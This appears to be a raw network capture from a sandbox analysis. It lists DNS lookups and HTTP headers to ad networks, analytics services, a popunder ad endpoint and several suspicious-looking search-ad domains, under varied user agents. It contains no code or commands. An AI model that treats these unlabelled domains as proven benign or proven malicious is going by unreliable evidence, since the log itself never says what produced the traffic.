DNS438b44e68a18a815aaf4aa6ab.litix.ioRemote address:8.8.8.8:53Request438b44e68a18a815aaf4aa6ab.litix.ioIN AResponse438b44e68a18a815aaf4aa6ab.litix.ioIN CNAMEa4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.coma4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A35.168.81.87a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.214.248.99a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.225.211.88a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A52.202.125.30a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A34.202.87.223a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.209.245.140
-
DNSexample.orgRemote address:8.8.8.8:53Requestexample.orgIN AResponseexample.orgIN A93.184.216.34
-
DNStop.searchinfonow.comRemote address:8.8.8.8:53Requesttop.searchinfonow.comIN AResponsetop.searchinfonow.comIN CNAMEiac.techadsmedia.comiac.techadsmedia.comIN A51.91.200.241
-
GEThttp://example.org/Remote address:93.184.216.34:80RequestGET / HTTP/1.1
Host: example.org
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Age: 331501
Cache-Control: max-age=604800
Content-Type: text/html; charset=UTF-8
Date: Mon, 06 Sep 2021 09:42:13 GMT
Etag: "3147526947+gzip"
Expires: Mon, 13 Sep 2021 09:42:13 GMT
Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
Server: ECS (bsa/EB21)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 648
-
DNSpubads.g.doubleclick.netRemote address:8.8.8.8:53Requestpubads.g.doubleclick.netIN AResponsepubads.g.doubleclick.netIN CNAMEpartnerad.l.doubleclick.netpartnerad.l.doubleclick.netIN A216.58.208.98
-
DNSsearchengineads.netRequestsearchengineads.netIN AResponsesearchengineads.netIN A103.63.108.18
-
DNScdn-gl.imrworldwide.comRequestcdn-gl.imrworldwide.comIN AResponsecdn-gl.imrworldwide.comIN CNAMEd2926jmvsihu4k.cloudfront.netd2926jmvsihu4k.cloudfront.netIN A52.222.139.73d2926jmvsihu4k.cloudfront.netIN A52.222.139.71d2926jmvsihu4k.cloudfront.netIN A52.222.139.86d2926jmvsihu4k.cloudfront.netIN A52.222.139.80
-
GEThttp://pagead2.googlesyndication.com/omsdk/releases/live/omsdk-v1.jsRequestGET /omsdk/releases/live/omsdk-v1.js HTTP/1.1
Host: pagead2.googlesyndication.com
Connection: keep-alive
Connection: keep-alive
Accept: */*
If-Modified-Since: Thu, 17 Jun 2021 21:21:27 GMT
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/604.1
Accept-Language: en-us
Referer: http://imasdk.googleapis.com/native/sdkloader/native_sdk_v3.html?app=H443NM7F8H.CBSSportsApp&hl=en&mt=2&omv=1.3.3-google_20200427&sdk_version=i.3.14.4&wvr=2
Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 304 Not Modified
Date: Mon, 06 Sep 2021 09:41:13 GMT
Expires: Mon, 06 Sep 2021 10:41:13 GMT
Age: 62
Cache-Control: public, max-age=3600
Vary: accept-encoding
-
DNScdn.branch.ioRequestcdn.branch.ioIN AResponsecdn.branch.ioIN A52.222.139.118cdn.branch.ioIN A52.222.139.129cdn.branch.ioIN A52.222.139.108cdn.branch.ioIN A52.222.139.94
-
GEThttp://vexacion.com/afu.php?zoneid=1851513RequestGET /afu.php?zoneid=1851513 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: vexacion.com
Connection: Keep-Alive
Cookie: OAID=4cc469f0e2f942c89a6ac637bd56453d; oaidts=1630921094
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:42:15 GMT
Content-Type: text/html; charset=utf8
Transfer-Encoding: chunked
Connection: keep-alive
X-Trace-Id: 4ce271c6304aa8aabf4ffa55bfbc7fc4
Link: <https://propeller-tracking.com>; rel="preconnect dns-prefetch",<https://my.rtmark.net>; rel="preconnect dns-prefetch"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding
Access-Control-Max-Age: 86400
Pragma: no-cache
Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
Expires: Tue, 11 Jan 1994 10:00:00 GMT
Timing-Allow-Origin: *
Set-Cookie: OAID=4cc469f0e2f942c89a6ac637bd56453d; expires=Tue, 06 Sep 2022 09:42:15 GMT; path=/
Set-Cookie: oaidts=1630921094; expires=Tue, 06 Sep 2022 09:42:15 GMT; path=/
Strict-Transport-Security: max-age=1
X-Content-Type-Options: nosniff
Timing-Allow-Origin: *
Content-Encoding: gzip
-
GEThttp://vexacion.com/favicon.icoRequestGET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: vexacion.com
Connection: Keep-Alive
Cookie: OAID=4cc469f0e2f942c89a6ac637bd56453d; oaidts=1630921094
ResponseHTTP/1.1 204 No Content
Server: nginx
Date: Mon, 06 Sep 2021 09:42:21 GMT
Connection: keep-alive
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
-
DNSgoogle.comRequestgoogle.comIN AResponsegoogle.comIN A142.251.36.46
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNSwww.gstatic.comRequestwww.gstatic.comIN AResponsewww.gstatic.comIN A142.251.36.3
-
DNSbeacons.gcp.gvt2.comRequestbeacons.gcp.gvt2.comIN AResponsebeacons.gcp.gvt2.comIN CNAMEbeacons-handoff.gcp.gvt2.combeacons-handoff.gcp.gvt2.comIN A142.250.179.131
-
DNSsearchengineads.netRequestsearchengineads.netIN AResponsesearchengineads.netIN A103.63.108.18
-
DNSuol1a8go1bvtabxtbkkziopipzbfo1630921323.uaid.imrworldwide.comRequestuol1a8go1bvtabxtbkkziopipzbfo1630921323.uaid.imrworldwide.comIN AResponseuol1a8go1bvtabxtbkkziopipzbfo1630921323.uaid.imrworldwide.comIN CNAMEd29sshy11yr8a1.cloudfront.netd29sshy11yr8a1.cloudfront.netIN A13.227.222.26d29sshy11yr8a1.cloudfront.netIN A13.227.222.91d29sshy11yr8a1.cloudfront.netIN A13.227.222.126d29sshy11yr8a1.cloudfront.netIN A13.227.222.128
-
DNSsearchengineads.netRequestsearchengineads.netIN AResponsesearchengineads.netIN A103.63.108.18
-
DNSfeed.lookbox.netRequestfeed.lookbox.netIN AResponsefeed.lookbox.netIN A172.67.164.57feed.lookbox.netIN A104.21.15.206
-
DNSfeed.lookbox.netRequestfeed.lookbox.netIN AResponsefeed.lookbox.netIN A172.67.164.57feed.lookbox.netIN A104.21.15.206
-
DNSfeed.lookbox.netRequestfeed.lookbox.netIN AResponsefeed.lookbox.netIN A104.21.15.206feed.lookbox.netIN A172.67.164.57
-
DNSdai.google.comRequestdai.google.comIN AResponsedai.google.comIN CNAMEwww3.l.google.comwww3.l.google.comIN A142.251.36.14
-
DNSfeed.lookbox.netRequestfeed.lookbox.netIN AResponsefeed.lookbox.netIN A172.67.164.57feed.lookbox.netIN A104.21.15.206
-
DNS438b44e68a18a815aaf4aa6ab.litix.ioRequest438b44e68a18a815aaf4aa6ab.litix.ioIN AResponse438b44e68a18a815aaf4aa6ab.litix.ioIN CNAMEa4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.coma4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.209.245.140a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A34.202.87.223a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A52.202.125.30a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.225.211.88a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.214.248.99a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A35.168.81.87
-
DNSdai.google.comRequestdai.google.comIN AResponsedai.google.comIN CNAMEwww3.l.google.comwww3.l.google.comIN A142.251.36.14
-
DNSsecure-dcr.imrworldwide.comRequestsecure-dcr.imrworldwide.comIN AResponsesecure-dcr.imrworldwide.comIN CNAMEsecure-us.imrworldwide.comsecure-us.imrworldwide.comIN CNAMEsecure-origin.imrworldwide.comsecure-origin.imrworldwide.comIN CNAMEsecure-us-east-2.imrworldwide.comsecure-us-east-2.imrworldwide.comIN CNAMEcensus.us-east-2.nielsencollections.comcensus.us-east-2.nielsencollections.comIN A18.118.62.68census.us-east-2.nielsencollections.comIN A18.224.241.13census.us-east-2.nielsencollections.comIN A3.129.251.144census.us-east-2.nielsencollections.comIN A18.117.208.235census.us-east-2.nielsencollections.comIN A3.137.103.9census.us-east-2.nielsencollections.comIN A3.138.167.152census.us-east-2.nielsencollections.comIN A3.131.209.112census.us-east-2.nielsencollections.comIN A3.133.244.9
-
DNSdevice-api.urbanairship.comRequestdevice-api.urbanairship.comIN AResponsedevice-api.urbanairship.comIN A35.244.184.98
-
DNS438b44e68a18a815aaf4aa6ab.litix.ioRequest438b44e68a18a815aaf4aa6ab.litix.ioIN AResponse438b44e68a18a815aaf4aa6ab.litix.ioIN CNAMEa4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.coma4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.209.245.140a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A34.202.87.223a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A52.202.125.30a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.225.211.88a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.214.248.99a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A35.168.81.87
-
DNSuts-api.itunes.apple.comRequestuts-api.itunes.apple.comIN AResponseuts-api.itunes.apple.comIN CNAMEuts-api-cdn.itunes-apple.com.akadns.netuts-api-cdn.itunes-apple.com.akadns.netIN CNAMEuts-api.itunes.apple.com.edgesuite.netuts-api.itunes.apple.com.edgesuite.netIN CNAMEa1956.dscb.akamai.neta1956.dscb.akamai.netIN A104.109.143.139a1956.dscb.akamai.netIN A104.109.143.159
-
DNSr3---sn-5hne6ns6.googlevideo.comRequestr3---sn-5hne6ns6.googlevideo.comIN AResponser3---sn-5hne6ns6.googlevideo.comIN CNAMEr3.sn-5hne6ns6.googlevideo.comr3.sn-5hne6ns6.googlevideo.comIN A209.85.226.104
-
DNSs.yimg.comRequests.yimg.comIN AResponses.yimg.comIN CNAMEedge.gycpi.b.yahoodns.netedge.gycpi.b.yahoodns.netIN A87.248.116.12edge.gycpi.b.yahoodns.netIN A87.248.116.11
-
DNSwww.americascardroom.euRequestwww.americascardroom.euIN AResponsewww.americascardroom.euIN A104.16.210.45www.americascardroom.euIN A104.16.209.45
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
DNSuts-api.itunes.apple.comRequestuts-api.itunes.apple.comIN AResponseuts-api.itunes.apple.comIN CNAMEuts-api-cdn.itunes-apple.com.akadns.netuts-api-cdn.itunes-apple.com.akadns.netIN CNAMEuts-api.itunes.apple.com.edgesuite.netuts-api.itunes.apple.com.edgesuite.netIN CNAMEa1956.dscb.akamai.neta1956.dscb.akamai.netIN A104.109.143.139a1956.dscb.akamai.netIN A104.109.143.159
-
DNSsearchada.comRequestsearchada.comIN AResponsesearchada.comIN CNAMEsucteding-regerson.icusucteding-regerson.icuIN A3.234.28.191
-
DNSsearchada.comRequestsearchada.comIN AResponsesearchada.comIN CNAMEsucteding-regerson.icusucteding-regerson.icuIN A3.234.28.191
-
DNSsearchada.comRequestsearchada.comIN AResponsesearchada.comIN CNAMEsucteding-regerson.icusucteding-regerson.icuIN A3.234.28.191
-
DNSsearchada.comRequestsearchada.comIN AResponsesearchada.comIN CNAMEsucteding-regerson.icusucteding-regerson.icuIN A3.234.28.191
-
DNSbeacon.walmart.comRequestbeacon.walmart.comIN AResponsebeacon.walmart.comIN CNAMEbeacon-cdn-custom.walmart.com.akadns.netbeacon-cdn-custom.walmart.com.akadns.netIN CNAMEbeacon-cdn.walmart.com.akadns.netbeacon-cdn.walmart.com.akadns.netIN A40.124.130.12
-
DNSapis.google.comRequestapis.google.comIN AResponseapis.google.comIN CNAMEplus.l.google.complus.l.google.comIN A142.250.179.142
-
DNSsearchada.comRequestsearchada.comIN AResponsesearchada.comIN CNAMEsucteding-regerson.icusucteding-regerson.icuIN A3.234.28.191
-
DNSexample.orgRequestexample.orgIN AResponseexample.orgIN A93.184.216.34
-
GEThttp://example.org/RequestGET / HTTP/1.1
Host: example.org
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Accept-Ranges: bytes
Age: 524480
Cache-Control: max-age=604800
Content-Type: text/html; charset=UTF-8
Date: Mon, 06 Sep 2021 09:42:27 GMT
Etag: "3147526947"
Expires: Mon, 13 Sep 2021 09:42:27 GMT
Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
Server: ECS (bsa/EB12)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 648
-
DNScbs.hb-api.omtrdc.netRequestcbs.hb-api.omtrdc.netIN AResponsecbs.hb-api.omtrdc.netIN CNAMEva-edge.sc.omtrdc.netva-edge.sc.omtrdc.netIN A15.188.95.229va-edge.sc.omtrdc.netIN A13.36.218.177va-edge.sc.omtrdc.netIN A15.236.176.210
-
DNS438b44e68a18a815aaf4aa6ab.litix.ioRequest438b44e68a18a815aaf4aa6ab.litix.ioIN AResponse438b44e68a18a815aaf4aa6ab.litix.ioIN CNAMEa4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.coma4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A35.168.81.87a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A52.202.125.30a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.225.211.88a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A34.202.87.223a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.209.245.140a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.214.248.99
-
GEThttp://pagead2.googlesyndication.com/pagead/gen_204?count=31&libs=libswiftAVFoundation.dylib~libswiftAccelerate.dylib~libswiftCloudKit.dylib~libswiftContacts.dylib~libswiftCore.dylib~libswiftCoreAudio.dylib~libswiftCoreData.dylib~libswiftCoreFoundation.dylib~libswiftCoreGraphics.dylib~libswiftCoreImage.dylib~libswiftCoreLocation.dylib~libswiftCoreMIDI.dylib~libswiftCoreMedia.dylib~libswiftDarwin.dylib~libswiftDispatch.dylib~libswiftFoundation.dylib~libswiftGLKit.dylib~libswiftIntents.dylib~libswiftMediaPlayer.dylib~libswiftMetal.dylib~libswiftModelIO.dylib~libswiftNetwork.dylib~libswiftObjectiveC.dylib~libswiftPhotos.dylib~libswiftQuartzCore.dylib~libswiftSceneKit.dylib~libswiftSpriteKit.dylib~libswiftUIKit.dylib~libswiftos.dylib~libswiftsimd.dylib~SwiftUI&lid=135&sdkv=h.3.288.0&e=44745938&id=ima_native&c=3301102111823060&domain=imasdk.googleapis.comRequestGET /pagead/gen_204?count=31&libs=libswiftAVFoundation.dylib~libswiftAccelerate.dylib~libswiftCloudKit.dylib~libswiftContacts.dylib~libswiftCore.dylib~libswiftCoreAudio.dylib~libswiftCoreData.dylib~libswiftCoreFoundation.dylib~libswiftCoreGraphics.dylib~libswiftCoreImage.dylib~libswiftCoreLocation.dylib~libswiftCoreMIDI.dylib~libswiftCoreMedia.dylib~libswiftDarwin.dylib~libswiftDispatch.dylib~libswiftFoundation.dylib~libswiftGLKit.dylib~libswiftIntents.dylib~libswiftMediaPlayer.dylib~libswiftMetal.dylib~libswiftModelIO.dylib~libswiftNetwork.dylib~libswiftObjectiveC.dylib~libswiftPhotos.dylib~libswiftQuartzCore.dylib~libswiftSceneKit.dylib~libswiftSpriteKit.dylib~libswiftUIKit.dylib~libswiftos.dylib~libswiftsimd.dylib~SwiftUI&lid=135&sdkv=h.3.288.0&e=44745938&id=ima_native&c=3301102111823060&domain=imasdk.googleapis.com HTTP/1.1
Host: pagead2.googlesyndication.com
Connection: keep-alive
Connection: keep-alive
Accept: image/png,image/svg+xml,image/*;q=0.8,video/*;q=0.8,*/*;q=0.5
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/604.1
Accept-Language: en-us
Referer: http://imasdk.googleapis.com/native/sdkloader/native_sdk_v3.html?app=H443NM7F8H.CBSSportsApp&hl=en&mt=2&omv=1.3.3-google_20200427&sdk_version=i.3.14.4&wvr=2
Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 204 No Content
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Date: Mon, 06 Sep 2021 09:42:28 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 0
X-XSS-Protection: 0
-
GEThttp://pagead2.googlesyndication.com/pagead/gen_204?rt=thirdparty&lid=17&sdkv=h.3.288.0%2Fn.ios.3.14.4%2FH443NM7F8H.CBSSportsApp&e=44745938&id=ima_native&c=3301102111823060&domain=imasdk.googleapis.comRequestGET /pagead/gen_204?rt=thirdparty&lid=17&sdkv=h.3.288.0%2Fn.ios.3.14.4%2FH443NM7F8H.CBSSportsApp&e=44745938&id=ima_native&c=3301102111823060&domain=imasdk.googleapis.com HTTP/1.1
Host: pagead2.googlesyndication.com
Connection: keep-alive
Connection: keep-alive
Accept: image/png,image/svg+xml,image/*;q=0.8,video/*;q=0.8,*/*;q=0.5
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/604.1
Accept-Language: en-us
Referer: http://imasdk.googleapis.com/native/sdkloader/native_sdk_v3.html?app=H443NM7F8H.CBSSportsApp&hl=en&mt=2&omv=1.3.3-google_20200427&sdk_version=i.3.14.4&wvr=2
Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 204 No Content
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Date: Mon, 06 Sep 2021 09:42:28 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 0
X-XSS-Protection: 0
-
GEThttp://pagead2.googlesyndication.com/pagead/gen_204?status=enabled&lid=128&sdkv=h.3.288.0&e=44745938&id=ima_native&c=3301102111823060&domain=imasdk.googleapis.comRequestGET /pagead/gen_204?status=enabled&lid=128&sdkv=h.3.288.0&e=44745938&id=ima_native&c=3301102111823060&domain=imasdk.googleapis.com HTTP/1.1
Host: pagead2.googlesyndication.com
Connection: keep-alive
Connection: keep-alive
Accept: image/png,image/svg+xml,image/*;q=0.8,video/*;q=0.8,*/*;q=0.5
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/604.1
Accept-Language: en-us
Referer: http://imasdk.googleapis.com/native/sdkloader/native_sdk_v3.html?app=H443NM7F8H.CBSSportsApp&hl=en&mt=2&omv=1.3.3-google_20200427&sdk_version=i.3.14.4&wvr=2
Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 204 No Content
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Date: Mon, 06 Sep 2021 09:42:28 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 0
X-XSS-Protection: 0
-
GEThttp://pagead2.googlesyndication.com/pagead/gen_204?mode=1&lid=41&sdkv=h.3.288.0&e=44745938&id=ima_native&c=3301102111823060&domain=imasdk.googleapis.comRequestGET /pagead/gen_204?mode=1&lid=41&sdkv=h.3.288.0&e=44745938&id=ima_native&c=3301102111823060&domain=imasdk.googleapis.com HTTP/1.1
Host: pagead2.googlesyndication.com
Connection: keep-alive
Connection: keep-alive
Accept: image/png,image/svg+xml,image/*;q=0.8,video/*;q=0.8,*/*;q=0.5
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/604.1
Accept-Language: en-us
Referer: http://imasdk.googleapis.com/native/sdkloader/native_sdk_v3.html?app=H443NM7F8H.CBSSportsApp&hl=en&mt=2&omv=1.3.3-google_20200427&sdk_version=i.3.14.4&wvr=2
Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 204 No Content
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Date: Mon, 06 Sep 2021 09:42:28 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 0
X-XSS-Protection: 0
-
DNS7f077.v.fwmrm.netRequest7f077.v.fwmrm.netIN AResponse7f077.v.fwmrm.netIN CNAMEg13v.prd.ads.aws.fwmrm.netg13v.prd.ads.aws.fwmrm.netIN CNAMEgslb-op-us-east-02.v.fwmrm.netgslb-op-us-east-02.v.fwmrm.netIN A38.98.139.48gslb-op-us-east-02.v.fwmrm.netIN A38.98.139.49gslb-op-us-east-02.v.fwmrm.netIN A63.251.28.48gslb-op-us-east-02.v.fwmrm.netIN A63.251.28.49gslb-op-us-east-02.v.fwmrm.netIN A63.251.28.148gslb-op-us-east-02.v.fwmrm.netIN A63.251.28.149gslb-op-us-east-02.v.fwmrm.netIN A75.98.70.48gslb-op-us-east-02.v.fwmrm.netIN A75.98.70.49
-
DNSerrors.imrworldwide.comRequesterrors.imrworldwide.comIN AResponseerrors.imrworldwide.comIN CNAMEerror-blue-bifrost.uw2-blue.nielsendigital.neterror-blue-bifrost.uw2-blue.nielsendigital.netIN A100.20.12.30error-blue-bifrost.uw2-blue.nielsendigital.netIN A52.13.245.49error-blue-bifrost.uw2-blue.nielsendigital.netIN A52.26.115.248
-
GEThttp://pagead2.googlesyndication.com/pagead/gen_204?native_version=i.3.14.4&app_name=H443NM7F8H.CBSSportsApp&lid=9&sdkv=h.3.288.0&e=44745938&id=ima_native&c=3301102111823060&domain=imasdk.googleapis.comRequestGET /pagead/gen_204?native_version=i.3.14.4&app_name=H443NM7F8H.CBSSportsApp&lid=9&sdkv=h.3.288.0&e=44745938&id=ima_native&c=3301102111823060&domain=imasdk.googleapis.com HTTP/1.1
Host: pagead2.googlesyndication.com
Connection: keep-alive
Connection: keep-alive
Accept: image/png,image/svg+xml,image/*;q=0.8,video/*;q=0.8,*/*;q=0.5
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/604.1
Accept-Language: en-us
Referer: http://imasdk.googleapis.com/native/sdkloader/native_sdk_v3.html?app=H443NM7F8H.CBSSportsApp&hl=en&mt=2&omv=1.3.3-google_20200427&sdk_version=i.3.14.4&wvr=2
Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 204 No Content
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Date: Mon, 06 Sep 2021 09:42:29 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 0
X-XSS-Protection: 0
-
DNSexample.orgRequestexample.orgIN AResponseexample.orgIN A93.184.216.34
-
GEThttp://pagead2.googlesyndication.com/pagead/gen_204?app_name=H443NM7F8H.CBSSportsApp&external_version=ios.3.14.4&delay=0&vpaidadapter=f&request_type=thirdparty&ctv=0&lid=6&sdkv=h.3.288.0%2Fn.ios.3.14.4%2FH443NM7F8H.CBSSportsApp&e=44745938&id=ima_native&c=3301102111823060&domain=imasdk.googleapis.comRequestGET /pagead/gen_204?app_name=H443NM7F8H.CBSSportsApp&external_version=ios.3.14.4&delay=0&vpaidadapter=f&request_type=thirdparty&ctv=0&lid=6&sdkv=h.3.288.0%2Fn.ios.3.14.4%2FH443NM7F8H.CBSSportsApp&e=44745938&id=ima_native&c=3301102111823060&domain=imasdk.googleapis.com HTTP/1.1
Host: pagead2.googlesyndication.com
Connection: keep-alive
Connection: keep-alive
Accept: image/png,image/svg+xml,image/*;q=0.8,video/*;q=0.8,*/*;q=0.5
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/604.1
Accept-Language: en-us
Referer: http://imasdk.googleapis.com/native/sdkloader/native_sdk_v3.html?app=H443NM7F8H.CBSSportsApp&hl=en&mt=2&omv=1.3.3-google_20200427&sdk_version=i.3.14.4&wvr=2
Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 204 No Content
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Date: Mon, 06 Sep 2021 09:42:30 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 0
X-XSS-Protection: 0
-
GEThttp://pagead2.googlesyndication.com/pagead/gen_204?blob=nullPromise&lid=155&sdkv=h.3.288.0&e=44745938&id=ima_native&c=3301102111823060&domain=imasdk.googleapis.comRequestGET /pagead/gen_204?blob=nullPromise&lid=155&sdkv=h.3.288.0&e=44745938&id=ima_native&c=3301102111823060&domain=imasdk.googleapis.com HTTP/1.1
Host: pagead2.googlesyndication.com
Connection: keep-alive
Connection: keep-alive
Accept: image/png,image/svg+xml,image/*;q=0.8,video/*;q=0.8,*/*;q=0.5
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/604.1
Accept-Language: en-us
Referer: http://imasdk.googleapis.com/native/sdkloader/native_sdk_v3.html?app=H443NM7F8H.CBSSportsApp&hl=en&mt=2&omv=1.3.3-google_20200427&sdk_version=i.3.14.4&wvr=2
Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 204 No Content
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Date: Mon, 06 Sep 2021 09:42:30 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 0
X-XSS-Protection: 0
-
